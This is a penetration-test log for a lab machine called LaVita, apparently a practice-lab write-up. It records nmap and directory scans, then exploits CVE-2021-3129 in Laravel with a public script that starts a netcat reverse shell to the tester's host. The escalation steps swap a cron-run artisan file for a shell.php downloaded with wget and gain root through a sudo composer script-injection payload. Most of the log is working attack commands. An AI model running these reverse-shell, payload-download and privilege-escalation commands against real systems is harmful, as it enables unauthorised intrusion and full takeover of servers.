🧪 Pentest Log: {{date:2025-08-10}}

🔍 Target Information

• Machine Name: LaVita
• IP Address: 192.168.187.38
• Operating System: Linux

ip=192.168.187.38

📡 Enumeration

🔌 Port Scanning

Command Used

ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt

nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt

Port 22

Port 80

Web Content Enumeration

Laravel 8.4.0

gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt

dirsearch -u http://$ip -r -o dirsearch.txt

sdfquelw0kly9jgbx92

💣 Exploitation

📌 Vulnerability Summary

• Service / Port: 80
• Vulnerability Type: LFI

🚀 Exploit Execution

🔧 Exploit Method

• Manual
• Public Exploit
• Custom Script

Tool / Script Used:

https://github.com/joshuavanderpoll/CVE-2021-3129

python3 CVE-2021-3129.py --host http://192.168.187.38 --exec nc 192.168.45.163 80 -e /bin/bash

penelope -p 80

🧬 Privilege Escalation

👤 Current Access

• User: www-data
• Groups: www-data
• Shell Type: reverse shell

🔍 Enumeration

Scheduled Tasks:

./pspy64

found

2025/08/10 17:03:01 CMD: UID=1001  PID=17401  | /bin/sh -c /usr/bin/php /var/www/html/lavita/artisan clear:pictures

mv artisan artisan.bak

wget http://192.168.45.163:8000/shell.php

mv shell.php artisan

nc -lvnp 443

🔓 Privilege Escalation Exploit

📌 Exploit Summary

• Technique Used: Sudo Misconfiguration
• Target Binary/Service: composer
• Reference / Source: GTFOBins

🔧 Exploit Steps

• Setup

echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' > /var/www/html/lavita/composer.json

• Smash to root

sudo /usr/bin/composer --working-dir\=/var/www/html/lavita run-script x